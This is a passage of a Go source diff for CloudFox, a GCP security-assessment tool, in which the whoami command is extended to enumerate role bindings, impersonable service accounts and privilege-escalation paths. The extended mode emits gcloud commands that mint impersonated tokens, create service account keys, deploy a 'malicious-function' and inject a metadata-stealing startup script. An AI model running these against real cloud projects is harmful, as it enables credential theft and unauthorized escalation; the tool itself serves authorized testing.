lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := VPCSCOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, 
m.WrapTable,
+		"org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output)
+	if err != nil {
+		m.CommandCounter.Error++
+		gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME,
+			"Could not write output")
+	}
+}
diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go
index c686b7ba..c8a2fd83 100644
--- a/gcp/commands/whoami.go
+++ b/gcp/commands/whoami.go
@@ -1,34 +1,1089 @@
 package commands
 
 import (
+	"context"
 	"fmt"
+	"strings"
+	"sync"
 
+	IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService"
 	OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService"
 	"github.com/BishopFox/cloudfox/globals"
 	"github.com/BishopFox/cloudfox/internal"
+	gcpinternal "github.com/BishopFox/cloudfox/internal/gcp"
 	"github.com/spf13/cobra"
+
+	cloudidentity "google.golang.org/api/cloudidentity/v1"
+	cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1"
+	crmv3 "google.golang.org/api/cloudresourcemanager/v3"
 )
 
+// Flags for whoami command
+var whoamiExtended bool
+var whoamiGroups []string
+
 var GCPWhoAmICommand = &cobra.Command{
-	Use:   globals.GCP_WHOAMI_MODULE_NAME,
-	Short: "Display the email address of the GCP authenticated user",
-	Args:  cobra.NoArgs,
-	Run:   runGCPWhoAmICommand,
+	Use:     globals.GCP_WHOAMI_MODULE_NAME,
+	Aliases: []string{"identity", "me"},
+	Short:   "Display identity context for the authenticated GCP user/service account",
+	Long: `Display identity context for the authenticated GCP user/service account.
+ +Default output: +- Current identity details (email, type) +- Organization and folder context +- Effective role bindings across projects (with inheritance source) + +With --extended flag (adds): +- Service accounts that can be impersonated +- Privilege escalation opportunities +- Exploitation commands + +With --groups flag: +- Provide known group email addresses when group enumeration is permission denied +- Role bindings from these groups will be included in the output +- Use comma-separated list: --groups=group1@domain.com,group2@domain.com`, + Run: runGCPWhoAmICommand, +} + +func init() { + GCPWhoAmICommand.Flags().BoolVarP(&whoamiExtended, "extended", "e", false, "Enable extended enumeration (impersonation targets, privilege escalation paths)") + GCPWhoAmICommand.Flags().StringSliceVarP(&whoamiGroups, "groups", "g", []string{}, "Comma-separated list of known group email addresses (used when group enumeration is permission denied)") +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type IdentityContext struct { + Email string + Type string // "user" or "serviceAccount" + UniqueID string + ProjectIDs []string // Keep for backward compatibility + Projects []ProjectInfo // New: stores project ID and display name + Organizations []OrgInfo + Folders []FolderInfo + Groups []GroupMembership // Groups the identity is a member of + GroupsEnumerated bool // Whether group enumeration was successful + GroupsProvided []string // Groups provided via --groups flag + GroupsMismatch bool // True if provided groups differ from enumerated +} + +type ProjectInfo struct { + ProjectID string + DisplayName string +} + +type OrgInfo struct { + Name string + DisplayName string + OrgID string +} + +type FolderInfo struct { + Name string + DisplayName string + Parent string +} + +type GroupMembership struct { + GroupID string // e.g., "groups/abc123" + Email string // e.g., "security-team@example.com" + DisplayName string // e.g., 
"Security Team" + Source string // "enumerated" or "provided" +} + +type RoleBinding struct { + Role string + Scope string // "organization", "folder", "project" + ScopeID string + ScopeName string // Display name of the scope resource + Inherited bool + Condition string + InheritedFrom string // Source of binding: "direct", group email, or parent resource + MemberType string // "user", "serviceAccount", "group" +} + +type ImpersonationTarget struct { + ServiceAccount string + ProjectID string + CanImpersonate bool + CanCreateKeys bool + CanActAs bool +} + +type PrivilegeEscalationPath struct { + Name string + Description string + Risk string // CRITICAL, HIGH, MEDIUM + Command string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type WhoAmIModule struct { + gcpinternal.BaseGCPModule + + Identity IdentityContext + RoleBindings []RoleBinding + ImpersonationTargets []ImpersonationTarget + PrivEscPaths []PrivilegeEscalationPath + DangerousPermissions []string + LootMap map[string]*internal.LootFile + Extended bool + ProvidedGroups []string // Groups provided via --groups flag + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type WhoAmIOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } +func (o WhoAmIOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WhoAmIOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ func runGCPWhoAmICommand(cmd *cobra.Command, args []string) { - logger := internal.NewLogger() + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WHOAMI_MODULE_NAME) + if err != nil { + return + } - // Initialize the OAuthService - oauthService := OAuthService.NewOAuthService() + // Create module instance + module := &WhoAmIModule{ + BaseGCPModule: 
gcpinternal.NewBaseGCPModule(cmdCtx), + RoleBindings: []RoleBinding{}, + ImpersonationTargets: []ImpersonationTarget{}, + PrivEscPaths: []PrivilegeEscalationPath{}, + DangerousPermissions: []string{}, + LootMap: make(map[string]*internal.LootFile), + Extended: whoamiExtended, + ProvidedGroups: whoamiGroups, + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WhoAmIModule) Execute(ctx context.Context, logger internal.Logger) { + if m.Extended { + logger.InfoM("Gathering comprehensive identity context (extended mode)...", globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM("Gathering identity context...", globals.GCP_WHOAMI_MODULE_NAME) + } - // Call the WhoAmI function + // Step 1: Get current identity + oauthService := OAuthService.NewOAuthService() principal, err := oauthService.WhoAmI() if err != nil { - logger.ErrorM(fmt.Sprintf("Error retrieving token info: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "oauth2.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not retrieve token info") return } - logger.InfoM(fmt.Sprintf("authenticated user email: %s", principal.Email), globals.GCP_WHOAMI_MODULE_NAME) + m.Identity = IdentityContext{ + Email: principal.Email, + ProjectIDs: m.ProjectIDs, + } + + // Determine identity type + if strings.HasSuffix(principal.Email, ".gserviceaccount.com") { + m.Identity.Type = "serviceAccount" + } else { + m.Identity.Type = "user" + } + + logger.InfoM(fmt.Sprintf("Authenticated as: %s (%s)", m.Identity.Email, m.Identity.Type), globals.GCP_WHOAMI_MODULE_NAME) + + // Step 2: Get organization context (always run) + m.getOrganizationContext(ctx, logger) + + // Step 3: Get group memberships for the current identity + m.getGroupMemberships(ctx, logger) 
+ + // Step 4: Get role bindings across projects (always run) + m.getRoleBindings(ctx, logger) + + // Extended mode: Additional enumeration + if m.Extended { + // Step 4: Find impersonation targets + m.findImpersonationTargets(ctx, logger) + + // Step 5: Identify privilege escalation paths + m.identifyPrivEscPaths(ctx, logger) + } + + // Step 6: Generate loot + m.generateLoot() + + // Write output + m.writeOutput(ctx, logger) +} + +// getOrganizationContext retrieves organization and folder hierarchy +func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger internal.Logger) { + // Create resource manager clients + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Resource Manager client") + return + } + + // Create v3 client for fetching folder details + crmv3Service, err := crmv3.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Resource Manager v3 client") + // Continue without v3, we just won't get display names for folders + } + + // Get project ancestry for each project + for _, projectID := range m.ProjectIDs { + // Fetch project details to get display name + projectInfo := ProjectInfo{ + ProjectID: projectID, + } + project, err := crmService.Projects.Get(projectID).Do() + if err == nil && project != nil { + projectInfo.DisplayName = project.Name + } + m.Identity.Projects = append(m.Identity.Projects, projectInfo) + + // Get ancestry + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s", projectID)) + continue + } + + for _, ancestor := range resp.Ancestor { + 
switch ancestor.ResourceId.Type { + case "organization": + orgInfo := OrgInfo{ + OrgID: ancestor.ResourceId.Id, + Name: fmt.Sprintf("organizations/%s", ancestor.ResourceId.Id), + } + // Try to get display name for organization + org, err := crmService.Organizations.Get(orgInfo.Name).Do() + if err == nil && org != nil { + orgInfo.DisplayName = org.DisplayName + } + // Check if already added + exists := false + for _, o := range m.Identity.Organizations { + if o.OrgID == orgInfo.OrgID { + exists = true + break + } + } + if !exists { + m.Identity.Organizations = append(m.Identity.Organizations, orgInfo) + } + case "folder": + folderName := fmt.Sprintf("folders/%s", ancestor.ResourceId.Id) + folderInfo := FolderInfo{ + Name: folderName, + } + // Try to get display name for folder using v3 API + if crmv3Service != nil { + folder, err := crmv3Service.Folders.Get(folderName).Do() + if err == nil && folder != nil { + folderInfo.DisplayName = folder.DisplayName + folderInfo.Parent = folder.Parent + } + } + // Check if already added + exists := false + for _, f := range m.Identity.Folders { + if f.Name == folderInfo.Name { + exists = true + break + } + } + if !exists { + m.Identity.Folders = append(m.Identity.Folders, folderInfo) + } + } + } + } + + if len(m.Identity.Organizations) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization(s), %d folder(s)", len(m.Identity.Organizations), len(m.Identity.Folders)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// getGroupMemberships retrieves the groups that the current identity is a member of +func (m *WhoAmIModule) getGroupMemberships(ctx context.Context, logger internal.Logger) { + // Store provided groups + m.Identity.GroupsProvided = m.ProvidedGroups + + // Only applicable for user identities (not service accounts) + if m.Identity.Type != "user" { + m.Identity.GroupsEnumerated = true // N/A for service accounts + // If groups were provided for a service account, add them as provided + if len(m.ProvidedGroups) > 0 { + for _, 
groupEmail := range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) for service account", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } + return + } + + ciService, err := cloudidentity.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Identity client") + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) + return + } + + // Search for groups that the user is a direct member of + // The parent must be "groups/-" to search across all groups + query := fmt.Sprintf("member_key_id == '%s'", m.Identity.Email) + resp, err := ciService.Groups.Memberships.SearchDirectGroups("groups/-").Query(query).Do() + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not fetch group memberships") + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) + return + } + + // Successfully enumerated groups + m.Identity.GroupsEnumerated = true + + var enumeratedEmails []string + for _, membership := range resp.Memberships { + group := GroupMembership{ + GroupID: membership.Group, + DisplayName: membership.DisplayName, + Source: "enumerated", + } + if membership.GroupKey != nil { + group.Email = membership.GroupKey.Id + enumeratedEmails = append(enumeratedEmails, strings.ToLower(membership.GroupKey.Id)) + } + m.Identity.Groups = append(m.Identity.Groups, group) + } + + // Check for mismatch with provided groups + if len(m.ProvidedGroups) > 0 { + m.checkGroupMismatch(enumeratedEmails, logger) + } + + if 
len(m.Identity.Groups) > 0 { + logger.InfoM(fmt.Sprintf("Found %d group membership(s)", len(m.Identity.Groups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// useProvidedGroups adds provided groups when enumeration fails +func (m *WhoAmIModule) useProvidedGroups(logger internal.Logger) { + if len(m.ProvidedGroups) > 0 { + for _, groupEmail := range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) (enumeration failed)", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// checkGroupMismatch compares provided groups with enumerated groups +func (m *WhoAmIModule) checkGroupMismatch(enumeratedEmails []string, logger internal.Logger) { + enumeratedSet := make(map[string]bool) + for _, email := range enumeratedEmails { + enumeratedSet[strings.ToLower(email)] = true + } + + providedSet := make(map[string]bool) + for _, email := range m.ProvidedGroups { + providedSet[strings.ToLower(email)] = true + } + + // Check for provided groups not in enumerated + var notInEnumerated []string + for _, email := range m.ProvidedGroups { + if !enumeratedSet[strings.ToLower(email)] { + notInEnumerated = append(notInEnumerated, email) + } + } + + // Check for enumerated groups not in provided + var notInProvided []string + for _, email := range enumeratedEmails { + if !providedSet[strings.ToLower(email)] { + notInProvided = append(notInProvided, email) + } + } + + if len(notInEnumerated) > 0 || len(notInProvided) > 0 { + m.Identity.GroupsMismatch = true + if len(notInEnumerated) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Provided groups not found in enumerated: %s", strings.Join(notInEnumerated, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + if len(notInProvided) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Enumerated groups not in provided list: %s", strings.Join(notInProvided, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + } +} + +// 
getRoleBindings retrieves IAM role bindings for the current identity +func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + // Build list of group members to check + groupMembers := make(map[string]string) // group:email -> email for display + for _, group := range m.Identity.Groups { + if group.Email != "" { + groupMembers["group:"+group.Email] = group.Email + } + } + + // Get role bindings from each project + for _, projectID := range m.ProjectIDs { + // Use PrincipalsWithRolesEnhanced which includes inheritance + principals, err := iamService.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get IAM bindings for project %s", projectID)) + continue + } + + // Find bindings for the current identity (direct) + for _, principal := range principals { + if principal.Name == fullMember || principal.Email == m.Identity.Email { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: "direct", + MemberType: m.Identity.Type, + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + // Set inherited source if from parent resource + if binding.IsInherited && binding.InheritedFrom != "" { + rb.InheritedFrom = binding.InheritedFrom + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s", binding.Role, binding.ResourceID)) + } 
+ + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + + // Check for group-based bindings + if groupEmail, ok := groupMembers[principal.Name]; ok { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: fmt.Sprintf("group:%s", groupEmail), + MemberType: "group", + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s (via group %s)", binding.Role, binding.ResourceID, groupEmail)) + } + + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + } + } + + directCount := 0 + groupCount := 0 + for _, rb := range m.RoleBindings { + if rb.MemberType == "group" { + groupCount++ + } else { + directCount++ + } + } + + if groupCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) (%d direct, %d via groups)", len(m.RoleBindings), directCount, groupCount), globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) for current identity", len(m.RoleBindings)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// findImpersonationTargets identifies service accounts that can be impersonated +func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + for _, projectID := range m.ProjectIDs { + // Get all service accounts in the project + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err 
!= nil { + continue + } + + for _, sa := range serviceAccounts { + // Check if current identity can impersonate this SA using GetServiceAccountIAMPolicy + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Check if current identity is in the token creators or key creators list + canImpersonate := false + canCreateKeys := false + canActAs := false + + for _, tc := range impersonationInfo.TokenCreators { + if tc == fullMember || tc == m.Identity.Email || tc == "allUsers" || tc == "allAuthenticatedUsers" { + canImpersonate = true + break + } + } + + for _, kc := range impersonationInfo.KeyCreators { + if kc == fullMember || kc == m.Identity.Email || kc == "allUsers" || kc == "allAuthenticatedUsers" { + canCreateKeys = true + break + } + } + + for _, aa := range impersonationInfo.ActAsUsers { + if aa == fullMember || aa == m.Identity.Email || aa == "allUsers" || aa == "allAuthenticatedUsers" { + canActAs = true + break + } + } + + if canImpersonate || canCreateKeys || canActAs { + target := ImpersonationTarget{ + ServiceAccount: sa.Email, + ProjectID: projectID, + CanImpersonate: canImpersonate, + CanCreateKeys: canCreateKeys, + CanActAs: canActAs, + } + m.ImpersonationTargets = append(m.ImpersonationTargets, target) + } + } + } + + if len(m.ImpersonationTargets) > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d service account(s) that can be impersonated", len(m.ImpersonationTargets)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyPrivEscPaths identifies privilege escalation paths based on current permissions +func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { + // Check for privilege escalation opportunities based on role bindings + for _, rb := range m.RoleBindings { + paths := getPrivEscPathsForRole(rb.Role, rb.ScopeID) + m.PrivEscPaths = append(m.PrivEscPaths, paths...) 
+ } + + // Check impersonation-based privilege escalation + for _, target := range m.ImpersonationTargets { + if target.CanImpersonate { + path := PrivilegeEscalationPath{ + Name: fmt.Sprintf("Impersonate %s", target.ServiceAccount), + Description: "Can generate access tokens for this service account", + Risk: "HIGH", + Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + + if target.CanCreateKeys { + path := PrivilegeEscalationPath{ + Name: fmt.Sprintf("Create key for %s", target.ServiceAccount), + Description: "Can create persistent service account keys", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + } + + if len(m.PrivEscPaths) > 0 { + logger.InfoM(fmt.Sprintf("[PRIVESC] Found %d privilege escalation path(s)", len(m.PrivEscPaths)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// isDangerousRole checks if a role is considered dangerous +func isDangerousRole(role string) bool { + dangerousRoles := []string{ + "roles/owner", + "roles/editor", + "roles/iam.securityAdmin", + "roles/iam.serviceAccountAdmin", + "roles/iam.serviceAccountKeyAdmin", + "roles/iam.serviceAccountTokenCreator", + "roles/resourcemanager.organizationAdmin", + "roles/resourcemanager.folderAdmin", + "roles/resourcemanager.projectIamAdmin", + "roles/cloudfunctions.admin", + "roles/compute.admin", + "roles/container.admin", + "roles/storage.admin", + } + + for _, dr := range dangerousRoles { + if role == dr { + return true + } + } + return false +} + +// getPrivEscPathsForRole returns privilege escalation paths for a given role +func getPrivEscPathsForRole(role, projectID string) []PrivilegeEscalationPath { + var paths []PrivilegeEscalationPath + + switch role { + case "roles/iam.serviceAccountTokenCreator": + paths = append(paths, 
PrivilegeEscalationPath{ + Name: "Token Creator - Impersonate any SA", + Description: "Can generate access tokens for any service account in the project", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + }) + case "roles/iam.serviceAccountKeyAdmin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Key Admin - Create persistent keys", + Description: "Can create service account keys for any SA", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + }) + case "roles/cloudfunctions.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Cloud Functions Admin - Code Execution", + Description: "Can deploy Cloud Functions with SA permissions", + Risk: "HIGH", + Command: "gcloud functions deploy malicious-function --runtime=python39 --trigger-http --service-account=", + }) + case "roles/compute.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Compute Admin - Metadata Injection", + Description: "Can add startup scripts with SA access", + Risk: "HIGH", + Command: "gcloud compute instances add-metadata --metadata=startup-script='curl -H \"Metadata-Flavor: Google\" http://metadata/...'", + }) + case "roles/container.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Container Admin - Pod Deployment", + Description: "Can deploy pods with service account access", + Risk: "HIGH", + Command: fmt.Sprintf("gcloud container clusters get-credentials --project=%s", projectID), + }) + case "roles/owner", "roles/editor": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Owner/Editor - Full Project Access", + Description: "Has full control over project resources", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud projects get-iam-policy %s", projectID), + }) + } + + return paths +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WhoAmIModule) initializeLootFiles() 
{ + // Note: whoami-context and whoami-permissions loot files removed as redundant + // The same information is already saved to table/csv/json files + + // Extended mode loot files - these contain actionable commands + if m.Extended { + m.LootMap["whoami-impersonation"] = &internal.LootFile{ + Name: "whoami-impersonation", + Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + m.LootMap["whoami-privesc"] = &internal.LootFile{ + Name: "whoami-privesc", + Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + } +} + +func (m *WhoAmIModule) generateLoot() { + // Note: Context and permissions info is already saved to table/csv/json files + // Only generate loot files for extended mode (actionable commands) + + // Extended mode loot + if m.Extended { + // Impersonation loot + for _, target := range m.ImpersonationTargets { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n", + target.ServiceAccount, + target.ProjectID, + ) + if target.CanImpersonate { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud auth print-access-token --impersonate-service-account=%s\n", + target.ServiceAccount, + ) + } + if target.CanCreateKeys { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud iam service-accounts keys create key.json --iam-account=%s\n", + target.ServiceAccount, + ) + } + m.LootMap["whoami-impersonation"].Contents += "\n" + } + + // Privilege escalation loot + for _, path := range m.PrivEscPaths { + m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( + "## %s [%s]\n"+ + "# %s\n"+ + "%s\n\n", + path.Name, + path.Risk, + path.Description, + path.Command, + ) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WhoAmIModule) writeOutput(ctx context.Context, logger 
internal.Logger) { + // Identity table + identityHeader := []string{ + "Property", + "Value", + } + + identityBody := [][]string{ + {"Email", m.Identity.Email}, + {"Type", m.Identity.Type}, + } + + // Add project details (expanded) + for i, proj := range m.Identity.Projects { + label := "Project" + if len(m.Identity.Projects) > 1 { + label = fmt.Sprintf("Project %d", i+1) + } + if proj.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", proj.DisplayName, proj.ProjectID)}) + } else { + identityBody = append(identityBody, []string{label, proj.ProjectID}) + } + } + if len(m.Identity.Projects) == 0 { + identityBody = append(identityBody, []string{"Projects", "0"}) + } + + // Add organization details (expanded) + for i, org := range m.Identity.Organizations { + label := "Organization" + if len(m.Identity.Organizations) > 1 { + label = fmt.Sprintf("Organization %d", i+1) + } + if org.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", org.DisplayName, org.OrgID)}) + } else { + identityBody = append(identityBody, []string{label, org.OrgID}) + } + } + if len(m.Identity.Organizations) == 0 { + identityBody = append(identityBody, []string{"Organizations", "0"}) + } + + // Add folder details (expanded) + for i, folder := range m.Identity.Folders { + label := "Folder" + if len(m.Identity.Folders) > 1 { + label = fmt.Sprintf("Folder %d", i+1) + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + if folder.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", folder.DisplayName, folderID)}) + } else { + identityBody = append(identityBody, []string{label, folderID}) + } + } + if len(m.Identity.Folders) == 0 { + identityBody = append(identityBody, []string{"Folders", "0"}) + } + + // Add group membership details (expanded) + for i, group := range m.Identity.Groups { + label := "Group" + if len(m.Identity.Groups) > 1 { + label = 
fmt.Sprintf("Group %d", i+1) + } + + // Build display value with source indicator + var displayValue string + if group.DisplayName != "" && group.Email != "" { + displayValue = fmt.Sprintf("%s (%s)", group.DisplayName, group.Email) + } else if group.Email != "" { + displayValue = group.Email + } else if group.DisplayName != "" { + displayValue = group.DisplayName + } else { + displayValue = group.GroupID + } + + // Add source indicator + if group.Source == "provided" { + displayValue += " (provided)" + } else if group.Source == "enumerated" && m.Identity.GroupsMismatch { + displayValue += " (enumerated)" + } + + identityBody = append(identityBody, []string{label, displayValue}) + } + if len(m.Identity.Groups) == 0 { + if m.Identity.GroupsEnumerated { + identityBody = append(identityBody, []string{"Groups", "0"}) + } else { + identityBody = append(identityBody, []string{"Groups", "Unknown (permission denied)"}) + } + } + + // Add role binding details (expanded) + for i, rb := range m.RoleBindings { + label := "Role Binding" + if len(m.RoleBindings) > 1 { + label = fmt.Sprintf("Role Binding %d", i+1) + } + // Format: Role -> Scope (ScopeID) + scopeDisplay := rb.ScopeID + if rb.ScopeName != "" { + scopeDisplay = fmt.Sprintf("%s (%s)", rb.ScopeName, rb.ScopeID) + } + + // Build source/inheritance info + sourceStr := "" + if rb.InheritedFrom != "" && rb.InheritedFrom != "direct" { + if strings.HasPrefix(rb.InheritedFrom, "group:") { + // Group-based binding + sourceStr = fmt.Sprintf(" [via %s]", rb.InheritedFrom) + } else { + // Inherited from parent resource (folder/org) + sourceStr = fmt.Sprintf(" [inherited from %s]", rb.InheritedFrom) + } + } else if rb.InheritedFrom == "direct" { + sourceStr = " [direct]" + } + + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s on %s/%s%s", rb.Role, rb.Scope, scopeDisplay, sourceStr)}) + } + if len(m.RoleBindings) == 0 { + identityBody = append(identityBody, []string{"Role Bindings", "0"}) + } + + // Add extended 
info to identity table + if m.Extended { + identityBody = append(identityBody, []string{"Impersonation Targets", fmt.Sprintf("%d", len(m.ImpersonationTargets))}) + identityBody = append(identityBody, []string{"Privilege Escalation Paths", fmt.Sprintf("%d", len(m.PrivEscPaths))}) + } + + // Role bindings table + rolesHeader := []string{ + "Role", + "Scope", + "Scope ID", + "Source", + } + + var rolesBody [][]string + for _, rb := range m.RoleBindings { + source := rb.InheritedFrom + if source == "" { + source = "direct" + } + rolesBody = append(rolesBody, []string{ + rb.Role, + rb.Scope, + rb.ScopeID, + source, + }) + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "whoami-identity", + Header: identityHeader, + Body: identityBody, + }, + } + + if len(rolesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "whoami-roles", + Header: rolesHeader, + Body: rolesBody, + }) + } + + // Extended mode tables + if m.Extended { + // Impersonation targets table + if len(m.ImpersonationTargets) > 0 { + impersonationHeader := []string{ + "Service Account", + "Project", + "Can Impersonate", + "Can Create Keys", + "Can ActAs", + } + + var impersonationBody [][]string + for _, target := range m.ImpersonationTargets { + impersonationBody = append(impersonationBody, []string{ + target.ServiceAccount, + target.ProjectID, + whoamiBoolToYesNo(target.CanImpersonate), + whoamiBoolToYesNo(target.CanCreateKeys), + whoamiBoolToYesNo(target.CanActAs), + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-impersonation", + Header: impersonationHeader, + Body: impersonationBody, + }) + } + + // Privilege escalation table + if len(m.PrivEscPaths) > 0 { + privescHeader := []string{ + "Path Name", + "Risk", + "Description", + "Command", + } + + var privescBody [][]string + for _, path := range m.PrivEscPaths { + privescBody = append(privescBody, []string{ + path.Name, + path.Risk, + path.Description, + path.Command, + }) + } + + tables = 
